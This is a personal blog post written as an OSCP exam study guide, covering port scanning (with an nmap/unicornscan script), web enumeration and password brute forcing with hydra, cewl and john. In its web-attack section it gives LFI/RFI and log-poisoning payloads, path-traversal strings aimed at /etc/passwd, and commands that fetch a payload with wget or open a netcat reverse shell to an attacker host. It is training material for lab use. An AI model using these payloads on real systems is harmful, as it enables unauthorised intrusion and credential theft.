OSCP Exam Study Guide I: First Steps

May 14, 2017

Hello, ladies and gents!

It's been awhile since my last post. I am not much of a blogger, but I've decided to step up my game. In the future I will post about vulnerable VMs that I have owned. These VMs will be downloadable at vulnhub, so if you would like to pentest, give them a try yourself and follow my guide--or not--it's up to you. The main purpose of this blog is to have a documented reference for myself. One that I will be able to access anywhere at anytime. But if you would like to use it, that sounds good to me. Anyway, let's get to the meat of this post--the guide.

Edit: I've decided to split the guide up into sections as the journey for a full and complete guide will be a long one.

OSCP Introduction

Soon I will be taking the OSCP exam for the second time. The OSCP (Offensive Security Certified Professional) is a certification course which throws you into a virtual lab environment where he, she or it are tasked with compromising as many machines as possible. There is no requirement on lab machines one needs to own in order to pass. Although, I'd recommend getting root on all machines (around sixty) before attempting the exam. The exam and the subsequent reports are the grade. One will get five extra points for the lab report--which I would recommend doing--as it may be that final push to give you a pass. The exam consists of five machines. Each of them 'harder', more obscure, and different than the lab--at least to my experience. To some, it may sound easy, and to even fewer it may actually BE easy. This may be the case if you are already a security professional or an advanced connoisseur.

The course gives the budding pentester the understanding and (hopefully) mastering of the methodology of a pentest. Meaning, you know how to find, edit, or even create exploits for public vulnerabilities. This, in practice, sounds simple--however it is not. The exploits you need to find and/or develop are often obscure and undocumented (specifically on the exam). But this is why this blog exists. To help the understanding and maturing of a dedicated individual who would like to get into the field of cyber security.

Pre-Exploitation Enumeration

Enumeration is the KEY to any successful pentest. Just like any other type of investigator, one needs to see all angles--all evidence--to know precisely how to proceed.

Two of the greatest tools a pentester can have for this task are the ever popular nmap, and perhaps the greatest tool ever invented--the search engine. Self reliance is life, and lack there of is death. I will write about this mode of thought more in the future, but I must first show the amount of utility these two tools have. You should always start with them!

Scanning

Below is a very simple, albeit useful, bash script that I created to speed up the first process I almost always tend to start with it. Many of you may notice it's terribly coded, but it doesn't really matter. The automation is what is important to me. One will find it very useful to automate any and all enumeration, whether it be post or pre exploitation. I have another script that is more thorough, as it uses a variety of tools to scan specific ports after being found. I've decided not to include this script as I like to see the information as it comes, instead of letting the script do all the work as it may skip important ports. For example, in my other script, if the tools locate default HTTP/HTTPS ports, it will auto brute force files and directories that are common on the specific web server, run specific nmap scripts, and run nikto. I'll give examples of these tools further down the line, so you can include them in your own script--if you would like.

#!/bin/bash
ARGV=$1
mkdir host_$ARGV
cd host_$ARGV
#SMBSCANDONE=0
BLUE='\033[0;34m'
GREEN='\033[0;32m'
RED='\033[0;31m'
PURP='\033[0;35m'
echo -e "${PURP}Auto Enumeration Script by Ian Fry"
echo -e "----------------------------------"
echo -e "Only checks default ports for services"
echo -e "Check the advanced scan Text file to see"
echo -e "If a non-default port is in use"

if [[ $1 == "" ]]; then
     USAGE="$0 <ip>"
     echo -e $USAGE
     exit 0
else
     rm unsortedopenports_$ARGV.txt
     rm sortedopenports_$ARGV.txt
     rm advancedscan_$ARGV.txt
     SECONDS=0
   
     echo -e "${BLUE}Beginning nmap Syn Scan Port Discovery"
     sudo nmap -sS -p- -T4 $ARGV -oG - | grep "/open/" | sed 's/ //g' | tr , '\n' | cut -d/ -f1 |cut -d ":" -f3 >> unsortedopenports_$ARGV.txt
     echo -e "${GREEN}nmap Syn Scan Completed"
     DURATION=$SECONDS
     echo "${PURP}Scan time: $(($DURATION / 60)) minutes and $(($DURATION % 60))"


     #SECONDS=0
     #DURATION=$SECONDS
     #echo -e "${BLUE}Beginning nmap UDP Scan Port Discovery"
     #sudo nmap -sU -p- -T4 $ARGV -oG - | grep "/open/" | sed 's/ //g' | tr , '\n' | cut -d/ -f1 |cut -d ":" -f3 >> unsortedopenports_$ARGV.txt
     #echo -e "${GREEN}nmap UDP Scan Completed in ${($DURATION / 60)} minutes and ${($DURATION % 60)}"


     SECONDS=0
   
     echo -e "${BLUE}Beginning UDP unicornscan"
     sudo unicornscan $ARGV | cut -d "[" -f2 |cut -d "]" -f1 |sed 's/ //g' >> unsortedopenports_$ARGV.txt
     echo -e "${GREEN}unicornscan Completed"
     DURATION=$SECONDS
     echo "${PURP}Scan time: $(($DURATION / 60)) minutes and $(($DURATION % 60))"
     #echo -e "Printing unsorted ports for debugging"
     #cat unsortedopenports_$ARGV.txt
     cat unsortedopenports_$ARGV.txt | sort -u -n >> sortedopenports_$ARGV.txt
     echo -e "${RED}Printing sorted ports for debugging"
     cat sortedopenports_$ARGV.txt

   
     commaports=$(cat sortedopenports_$ARGV.txt | sed -n -e 'H;${x;s/\n/,/g;s/^,//;p;}')
     echo -e "${RED}Open Ports:"
     cat $commaports

     SECONDS=0
   
     echo -e "${BLUE}Beginning Advanced Scan"
     sudo nmap -Pn --version-intensity 9 -p$commaports -A -T4 $1 >> advancedscan_$ARGV.txt
     echo -e "${GREEN}Advanced Scan Completed"
     DURATION=$SECONDS
     echo "${PURP}Scan time: $(($DURATION / 60)) minutes and $(($DURATION % 60))"
     echo -e "${RED}Nmap Advanced Scan Results:"
     cat advancedscan_$ARGV.txt
fi

Finding Ports

The script first does a thorough scan of all ports on the target IP address--both a SYN scan and UDP scan. These scans will often find all open/unfiltered ports that a target may have without using any nifty techniques such as an Idle scan.  This method seems to be sufficient for the OSCP, so I haven't included any advanced scanning techniques. It is important to note, however, that there are machines which recognize a scan attempt based on the speed and amount of probes sent. You may need to make some alterations to get an accurate scan.. (-T#)

sudo nmap -sS -p- -T4 $ARGV -oG - | grep "/open/" | sed 's/ //g' | tr , '\n' | cut -d/ -f1 |cut -d ":" -f3 >> unsortedopenports_$ARGV.txt

sudo unicornscan $ARGV | cut -d "[" -f2 |cut -d "]" -f1 |sed 's/ //g' >> unsortedopenports_$ARGV.txt

Notice I use grep-able format on the nmap syn scan in order to feed just the ports to a text file which I reference to later. I perform a unicorn scan instead of  an nmap UDP scan because it seems to be much faster. It's probably not as thorough as the nmap UDP scan, however, I got tired of waiting for it to complete. I also feed it to the unsorted ports file. This gives me a list of all open ports (hopefully) that I may use for the next scan.

I then sort out the unique values in numeric order and comma separate them in order to feed them effectively into the nmap 'advanced' scan. I know my method may not be efficient or pretty, but it gets the job done, and that's all I need. I'm sure plenty of coders will scoff at this script, but it's sufficient.

sudo nmap -Pn --version-intensity 9 -p$commaports -A -T4 $1 >> advancedscan_$ARGV.txt

Above will find possibly the services and OS version using only the ports which the other scans have found--this saves us time. Time is very valuable when taking the OSCP exam...

Enumerating Other Services



Finding Exploits

Searchsploit
Make sure your terminal is maximized!!! Searchsploit will omit results which will  not fit on a single line!
Examples:


ExploitDB

Security Focus

GitHub

Google

Web Attacks


If you find a webserver, I would first run nikto. Web servers usually have a large surface of attack, and thus are generally a good place to start with vulnerability detection. It's always good to use dirb, dirbuster, and/or wfuzz to find any 'juicy' files or directories. Also, don't leave out nmap scripts! Nmap scripts are very useful. For instance, if a server is running an outdated Coldfusion web application, you  may **ahem** just get lucky and nmap will find the vulnerable application and exploit it for you! When I was asked by other students for assistance, I pointed them to nmap scripts. They generally used much valuable time in class to find similar vulnerabilities even though nmap found them in a matter of seconds. This is a huge lesson here. Do not rely on any one scanner. It will save you time in the long run and could potentially be a huge waste of time when the answer was smacking you across the face.

Example webapp scans:

nikto -host <IP> -port <PORT> -C all

nmap --script=http-vuln*  -p<port> <IP> 
(Locate specific scripts with locate nmap |grep scripts)

dirb http(s)://<host> /usr/share/dirb/wordlists/big.txt

Try davtest if the server is hosting webdav. davtest scans available locations for the PUT method and scans for possible execution. Webdav has lots of potential for exploitation..
davtest -url  

If you do find a server using webdav, use the tool cadaver to explore and use available methods. One great method to find is the PUT method.

cadaver <url:port>

When you find a vulnerable web application--always browse to it. Much valuable information is obtained this way. Many sites are hand coded and are not created by a third party web application. I found a machine hosting a website which was void of any known web applications, but had a very obvious flaw. I had an idea of what the issue was as soon as I visited the website. It was using frames(!), and different frames had 'included' pages via a simple PHP function--include (imagine that). This function often has disastrous effects if left un-sanitized and enabled within the webserver configuration. This machine was labelled "painful" by many students, though I found this entry point almost immediately. These vulnerabilities are called Local File Includes and Remote File Includes, the latter being more dangerous as it allows you to include your own pages/files which are read/executed within the webserver.

File Includes

Vulnerabilities: <?php include($_GET[‘page’]);?> <?php include($_POST[‘page’]);?>
RFI Example: http://vulnerablehost/page.php?parameter=<remote host>/payload.php 
LFI Example: http://vulnerablehost/page.php?parameter=/etc/passwd
Above I used the null byte () to terminate any execution after it reads the payload. This bypasses poor sanitation.

A server may be vulnerable to RFIs if within the configuration (accessible by phpinfo()) the allow_url_fopen or allow_url_open configuration is enabled. allow_url_fopen is for older versions of PHP.

LFI's can also be used to execute payloads on the host by contaminating files with your own code! The most common of which are log files. When you try to access a page, a log is created with your user-agent, IP address, method, and access code (403,404,200, etc). You can use netcat connect and customize any of these options, and thus write your own code to the server's log file!

nc <host> <port>
GET /<?php shell_exec($_GET['cmd']); ?> HTTP/1.1
 
The above injects the shell_exec function into the log file. Then by using the LFI vulnerability one is able 
to traverse to the logfile and execute the command via the given parameter (cmd). Maybe you would want to
just create a remote include (if it's enabled via phpinfo). Makes execution of a reverse shell simple.


http(s)://vulnhost/page.php?parameter=<logfilelocation>&cmd=ls -la
http(s)://vulnhost/page.php?parameter=<logfilelocation>&cmd=wget <payload> /tmp/<payload> 
http(s)://vulnhost/page.php?parameter=<logfilelocation>&cmd=nc <rhost> <port> -e /bin/bash

Apache Access log locations:
RHEL / Red Hat / CentOS / Fedora Linux Apache access file location - /var/log/httpd/access_log
Debian / Ubuntu Linux Apache access log file location - /var/log/apache2/access.log
FreeBSD Apache access log file location - /var/log/httpd-access.log

Some great resources on File Includes here:
hakin9.org 
https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/
https://roguecod3r.wordpress.com/2014/03/17/lfi-to-shell-exploiting-apache-access-log/

Directory/Path Traversal

Although directory traversal seems most common in web server applications, it is also found in FTP, SMTP, POP3 servers. This vulnerability exists due to data being fed through an application un-sanitized and being read as a change directory command. This can be very useful to read files and directories outside the scope of the website.

Example:
http://vulnhost/index/../../../../etc/passwd

You can also use unicoded characters. Many times, input is improperly sanitized and unicode can often surpass this sanitation method.


Example:
http://vulnhost/index/../../../../etc/passwd
http://vulnhost/index/2E%2E%%2F%2E%2E%%2F%2E%2E%%2F%2E%2E%%2Fetc%2Fpasswd

Often you will need backslashes, multiple slashes, or a combination of both to bypass sanitation.
http://vulnhost/index/..\/..\/..\/..\/etc\/passwd
http://vulnhost/index/..//..//..//..//etc//passwd
http://vulnhost/index/..///..///..///..///etc///passwd


Great Resources for Directory Traversal:
http://www.vulnerability-lab.com/resources/documents/587.txt
https://www.owasp.org/index.php/Path_Traversal

Web App Password cracking

Found a known webapp? Locate default credentials (google)!!!

Many weak credentials were found during my lab tests, and it's always worth a shot as it can be a very effective and quick entry point. A successful password cracker may also use the tool cewl which collects words from a webserver and creates a wordlist. I found a machine that used the name of the web application as the password! This is a password that I guessed almost immediately, but a lot of the time one will need to mutate the list with JTR for a successful attempt.

cewl --depth <#> -w <outfile> <url>
john --wordlist=<cewlfile> --rules --stdout > mutated-cewl.txt
Make an awesome ruleset and automate this sequence! 
Note: default rule file location is /etc/john.conf
Awesome korelogic rules!
JTR examples

Once you have a suitable wordlist, attempt crack it!

hydra <host> <method> <formpath+parameters> -L <user list> -P <password list> -t <# of threads>  -w <wait for time out> -o <output file>

<formpath + parameters>:"/admin/login.php?user=^USER^&password=^PASS^:Incorrect Password"

^USER^ is where your user list is written to, ^PASS^ is where the password is written to, and "Incorrect Password" is an example string that is returned with a failed login (without this you will get all false positives)

You can also use medusa, but I've never used it. Password cracking isn't really necessary on the OSCP, but it can still be useful occasionally. There will be a more comprehensive guide on password cracking (specifically hashes) in later sections.

I decided not to put a SQLi section here as the attack method requires it's own section. The scope is huge and there is much to be said.

You Might Also Like

0 comments

Popular Posts

Like us on Facebook

Flickr Images